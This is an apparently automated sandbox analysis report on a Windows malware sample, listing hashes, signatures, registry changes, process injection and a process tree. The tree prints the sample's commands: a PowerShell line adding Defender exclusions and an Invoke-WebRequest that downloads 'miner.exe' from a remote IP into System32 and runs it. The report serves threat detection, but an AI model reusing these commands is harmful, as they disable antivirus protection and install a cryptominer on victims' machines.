Analysis
max time kernel: 150s
max time network: 147s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 03-06-2024 03:56
Static task: static1
Behavioral task: behavioral1
    Sample: 397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
    Resource: win10v2004-20240508-en
Behavioral task: behavioral2
    Sample: 397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
    Resource: win11-20240508-en
General
Target: 397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
Size: 96KB
MD5: 3a60efc9992d02574b59745cbdfb2334
SHA1: 28d4ef82fc79c586b1e32995789a84c1043a9c55
SHA256: 397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994
SHA512: 2fb2b6983040a9b747748b1e4d7c0e88e06e39a364ab8bbef2f4ee06c9f3a84cbe4ec1112ae5640ab98c3dc8a1a9bbc52ee63ac652cdd4f34c5e1e76784618ea
SSDEEP: 1536:xcx9ZYLP8rNqbfNqGEkLepf3NW7d9NE768l0e+SzF6JL5FhA7g/LSCvsW90VcdP0:xcqmqhkEeF3NWf8l0edFEhMgzgkP+vpP
Malware Config
Signatures
Blocklisted process makes network request (1 IoCs)
    flow | pid | Process
    1 | 3460 | powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
    pid | Process
    2476 | powershell.exe
    2468 | powershell.exe
    1664 | powershell.exe
    3460 | powershell.exe
Creates new service(s) (2 TTPs)
Downloads MZ/PE file
Drops file in Drivers directory (2 IoCs)
    description | ioc | Process
    File created | C:\Windows\system32\drivers\etc\hosts | msdr.exe
    File created | C:\Windows\system32\drivers\etc\hosts | updater.exe
Executes dropped EXE (2 IoCs)
    pid | Process
    3148 | msdr.exe
    2128 | updater.exe
Drops file in System32 directory (6 IoCs)
    description | ioc | Process
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
    File opened for modification | C:\Windows\system32\MRT.exe | updater.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
    File created | C:\Windows\SysWOW64\msdr.exe | powershell.exe
    File opened for modification | C:\Windows\system32\MRT.exe | msdr.exe
Suspicious use of SetThreadContext (4 IoCs)
    description | pid | Process | procid_target
    PID 3148 set thread context of 232 | 3148 | msdr.exe | 93
    PID 2128 set thread context of 2460 | 2128 | updater.exe | 116
    PID 2128 set thread context of 4944 | 2128 | updater.exe | 117
    PID 2128 set thread context of 3816 | 2128 | updater.exe | 122
Launches sc.exe (4 IoCs)
Sc.exe is a Windows utility to control services on the system.
    pid | Process
    468 | sc.exe
    3848 | sc.exe
    3936 | sc.exe
    800 | sc.exe
Modifies data under HKEY_USERS (60 IoCs)
    description | ioc | Process
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
    Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 03 Jun 2024 03:57:39 GMT" | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717387058" | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
    Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={89530C2A-38A8-42F3-9293-D54761B800B4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
    pid | Process
    2476 | powershell.exe
    2476 | powershell.exe
    3460 | powershell.exe
    3460 | powershell.exe
    4484 | powershell.exe
    4484 | powershell.exe
    3148 | msdr.exe
    2468 | powershell.exe
    2468 | powershell.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    3148 | msdr.exe
    3148 | msdr.exe
    3148 | msdr.exe
    2128 | updater.exe
    1664 | powershell.exe
    1664 | powershell.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    1664 | powershell.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    1664 | powershell.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    1664 | powershell.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    1664 | powershell.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
    232 | dialer.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
    description | pid | Process
    Token: SeDebugPrivilege | 2476 | powershell.exe
    Token: SeDebugPrivilege | 3460 | powershell.exe
    Token: SeDebugPrivilege | 4484 | powershell.exe
    Token: SeDebugPrivilege | 2468 | powershell.exe
    Token: SeDebugPrivilege | 232 | dialer.exe
    Token: SeShutdownPrivilege | 3340 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 3340 | powercfg.exe
    Token: SeShutdownPrivilege | 644 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 644 | powercfg.exe
    Token: SeShutdownPrivilege | 560 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 560 | powercfg.exe
    Token: SeShutdownPrivilege | 4856 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4856 | powercfg.exe
    Token: SeDebugPrivilege | 1664 | powershell.exe
    Token: SeDebugPrivilege | 2460 | dialer.exe
    Token: SeShutdownPrivilege | 2204 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 2204 | powercfg.exe
    Token: SeShutdownPrivilege | 2528 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 2528 | powercfg.exe
    Token: SeShutdownPrivilege | 4788 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4788 | powercfg.exe
    Token: SeShutdownPrivilege | 3548 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 3548 | powercfg.exe
    Token: SeLockMemoryPrivilege | 3816 | dialer.exe
    Token: SeAssignPrimaryTokenPrivilege | 2692 | svchost.exe
    Token: SeIncreaseQuotaPrivilege | 2692 | svchost.exe
    Token: SeSecurityPrivilege | 2692 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2692 | svchost.exe
    Token: SeLoadDriverPrivilege | 2692 | svchost.exe
    Token: SeSystemtimePrivilege | 2692 | svchost.exe
    Token: SeBackupPrivilege | 2692 | svchost.exe
    Token: SeRestorePrivilege | 2692 | svchost.exe
    Token: SeShutdownPrivilege | 2692 | svchost.exe
    Token: SeSystemEnvironmentPrivilege | 2692 | svchost.exe
    Token: SeUndockPrivilege | 2692 | svchost.exe
    Token: SeManageVolumePrivilege | 2692 | svchost.exe
    Token: SeAssignPrimaryTokenPrivilege | 2692 | svchost.exe
    Token: SeIncreaseQuotaPrivilege | 2692 | svchost.exe
    Token: SeSecurityPrivilege | 2692 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2692 | svchost.exe
    Token: SeLoadDriverPrivilege | 2692 | svchost.exe
    Token: SeSystemtimePrivilege | 2692 | svchost.exe
    Token: SeBackupPrivilege | 2692 | svchost.exe
    Token: SeRestorePrivilege | 2692 | svchost.exe
    Token: SeShutdownPrivilege | 2692 | svchost.exe
    Token: SeSystemEnvironmentPrivilege | 2692 | svchost.exe
    Token: SeUndockPrivilege | 2692 | svchost.exe
    Token: SeManageVolumePrivilege | 2692 | svchost.exe
    Token: SeAssignPrimaryTokenPrivilege | 2692 | svchost.exe
    Token: SeIncreaseQuotaPrivilege | 2692 | svchost.exe
    Token: SeSecurityPrivilege | 2692 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2692 | svchost.exe
    Token: SeLoadDriverPrivilege | 2692 | svchost.exe
    Token: SeSystemtimePrivilege | 2692 | svchost.exe
    Token: SeBackupPrivilege | 2692 | svchost.exe
    Token: SeRestorePrivilege | 2692 | svchost.exe
    Token: SeShutdownPrivilege | 2692 | svchost.exe
    Token: SeSystemEnvironmentPrivilege | 2692 | svchost.exe
    Token: SeUndockPrivilege | 2692 | svchost.exe
    Token: SeManageVolumePrivilege | 2692 | svchost.exe
    Token: SeAssignPrimaryTokenPrivilege | 2692 | svchost.exe
    Token: SeIncreaseQuotaPrivilege | 2692 | svchost.exe
    Token: SeSecurityPrivilege | 2692 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2692 | svchost.exe
Suspicious use of WriteProcessMemory (64 IoCs)
    description | pid | Process | procid_target
    PID 4812 wrote to memory of 2476 | 4812 | DllHost.exe | 78
    PID 4812 wrote to memory of 2476 | 4812 | DllHost.exe | 78
    PID 4812 wrote to memory of 2476 | 4812 | DllHost.exe | 78
    PID 4812 wrote to memory of 3460 | 4812 | DllHost.exe | 80
    PID 4812 wrote to memory of 3460 | 4812 | DllHost.exe | 80
    PID 4812 wrote to memory of 3460 | 4812 | DllHost.exe | 80
    PID 3852 wrote to memory of 4484 | 3852 | DllHost.exe | 83
    PID 3852 wrote to memory of 4484 | 3852 | DllHost.exe | 83
    PID 3852 wrote to memory of 4484 | 3852 | DllHost.exe | 83
    PID 4484 wrote to memory of 3148 | 4484 | powershell.exe | 85
    PID 4484 wrote to memory of 3148 | 4484 | powershell.exe | 85
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 3148 wrote to memory of 232 | 3148 | msdr.exe | 93
    PID 1084 wrote to memory of 4192 | 1084 | cmd.exe | 103
    PID 1084 wrote to memory of 4192 | 1084 | cmd.exe | 103
    PID 232 wrote to memory of 624 | 232 | dialer.exe | 5
    PID 232 wrote to memory of 692 | 232 | dialer.exe | 7
    PID 232 wrote to memory of 984 | 232 | dialer.exe | 12
    PID 232 wrote to memory of 428 | 232 | dialer.exe | 13
    PID 232 wrote to memory of 436 | 232 | dialer.exe | 14
    PID 232 wrote to memory of 1040 | 232 | dialer.exe | 15
    PID 232 wrote to memory of 1048 | 232 | dialer.exe | 16
    PID 232 wrote to memory of 1056 | 232 | dialer.exe | 17
    PID 232 wrote to memory of 1116 | 232 | dialer.exe | 18
    PID 232 wrote to memory of 1208 | 232 | dialer.exe | 20
    PID 232 wrote to memory of 1240 | 232 | dialer.exe | 21
    PID 232 wrote to memory of 1284 | 232 | dialer.exe | 22
    PID 232 wrote to memory of 1372 | 232 | dialer.exe | 23
    PID 232 wrote to memory of 1416 | 232 | dialer.exe | 24
    PID 232 wrote to memory of 1504 | 232 | dialer.exe | 25
    PID 232 wrote to memory of 1616 | 232 | dialer.exe | 26
    PID 232 wrote to memory of 1624 | 232 | dialer.exe | 27
    PID 232 wrote to memory of 1648 | 232 | dialer.exe | 28
    PID 232 wrote to memory of 1740 | 232 | dialer.exe | 29
    PID 232 wrote to memory of 1772 | 232 | dialer.exe | 30
    PID 232 wrote to memory of 1832 | 232 | dialer.exe | 31
    PID 232 wrote to memory of 1912 | 232 | dialer.exe | 32
    PID 232 wrote to memory of 2016 | 232 | dialer.exe | 33
    PID 232 wrote to memory of 2024 | 232 | dialer.exe | 34
    PID 232 wrote to memory of 1984 | 232 | dialer.exe | 35
    PID 232 wrote to memory of 2052 | 232 | dialer.exe | 36
    PID 232 wrote to memory of 2140 | 232 | dialer.exe | 37
    PID 232 wrote to memory of 2252 | 232 | dialer.exe | 39
    PID 232 wrote to memory of 2352 | 232 | dialer.exe | 40
    PID 232 wrote to memory of 2500 | 232 | dialer.exe | 41
    PID 232 wrote to memory of 2512 | 232 | dialer.exe | 42
    PID 232 wrote to memory of 2536 | 232 | dialer.exe | 43
    PID 232 wrote to memory of 2620 | 232 | dialer.exe | 44
    PID 232 wrote to memory of 2644 | 232 | dialer.exe | 45
    PID 232 wrote to memory of 2668 | 232 | dialer.exe | 46
    PID 232 wrote to memory of 2684 | 232 | dialer.exe | 47
    PID 232 wrote to memory of 2692 | 232 | dialer.exe | 48
    PID 232 wrote to memory of 2740 | 232 | dialer.exe | 49
    PID 232 wrote to memory of 2812 | 232 | dialer.exe | 50
    PID 232 wrote to memory of 3096 | 232 | dialer.exe | 51
    PID 232 wrote to memory of 3272 | 232 | dialer.exe | 52
    PID 232 wrote to memory of 3436 | 232 | dialer.exe | 53
    PID 232 wrote to memory of 3476 | 232 | dialer.exe | 54
    PID 232 wrote to memory of 3808 | 232 | dialer.exe | 57
Processes
    image path | command line | PID (indentation shows process-tree depth; signature hits are listed as bullets under the process)
C:\Windows\system32\winlogon.exe | winlogon.exe | PID:624
    C:\Windows\system32\dwm.exe | "dwm.exe" | PID:428
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID:692
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID:984
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID:436
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID:1040
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID:1048
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID:1056
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID:1116
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID:1208
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm | PID:1240
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID:1284
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID:1372
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID:1416
    C:\Windows\system32\sihost.exe | sihost.exe | PID:2740
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID:1504
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID:1616
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID:1624
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | PID:1648
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID:1740
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID:1772
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID:1832
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:1912
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:2016
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:2024
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID:1984
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID:2052
C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID:2140
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID:2252
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID:2352
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID:2500
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID:2512
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | PID:2536
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID:2620
C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID:2644
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID:2668
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID:2684
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID:2692
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID:2812
C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID:3096
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:3272
    C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe | "C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe" | PID:756
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | PID:3436
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | PID:3476
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID:3808
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID:3868
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID:3928
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc | PID:3992
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} | PID:4160
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc | PID:4464
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | PID:4820
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID:3424
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc | PID:1780
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | PID:3204
    - Modifies data under HKEY_USERS
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service | PID:1360
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding | PID:2036
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager | PID:3328
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID:2868
C:\Windows\SysWOW64\DllHost.exe | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | PID:4812
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\' | PID:2476
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://45.67.229.122/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe' | PID:3460
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\DllHost.exe | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | PID:3852
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe' | PID:4484
